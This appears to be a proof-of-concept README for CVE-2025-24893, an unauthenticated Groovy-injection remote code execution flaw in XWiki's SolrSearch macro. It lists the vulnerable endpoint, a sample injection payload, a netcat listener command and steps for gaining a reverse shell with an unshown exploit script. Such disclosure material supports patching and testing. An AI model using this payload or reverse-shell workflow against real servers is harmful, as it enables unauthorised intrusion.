CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC
CVE-2025-24893 is a critical unauthenticated remote code execution vulnerability in XWiki (versions < 15.10.11, 16.4.1, 16.5.0RC1) caused by improper handling of Groovy expressions in the SolrSearch macro.
Summary
CVE-2025-24893 is a critical RCE vulnerability in XWiki, caused by unsafe Groovy expression handling inside the SolrSearch macro. An attacker can inject Groovy code through a crafted GET request, leading to remote code execution (no authentication required).
- Severity: Critical (CVSS 9.8)
- Affected: Versions < 15.10.11, 16.4.1, 16.5.0RC1
π Technical Breakdown
The vulnerability resides in the SolrSearch macro (Main.SolrSearch) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for arbitrary code execution.
π₯ Vulnerable Endpoint
1
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
An attacker can inject Groovy code into the text parameter, which is evaluated server-side due to improper input handling within the macro system.
π₯ Example Payload
1
}}}'id'.execute()
This leads to unauthenticated Remote Code Execution (RCE) on vulnerable XWiki instances.
π¬ Proof-of-Concept (PoC) Demonstration
π§ͺ Target Environment
The vulnerable target is an XWiki instance running version 15.10.8, which is affected by CVE-2025-24893.
π‘ Preparing the Listener
Start a Netcat listener on the attackerβs machine to capture the reverse shell connection:
1
nc -lvnp 1337
π Launching the Exploit
Run the exploit script CVE-2025-24893-dbs.py to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.
π» Successful Remote Shell Access
Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.
π References
- OffSec Blog: CVE-2025-24893 XWiki Groovy RCE
- NVD Entry: CVE-2025-24893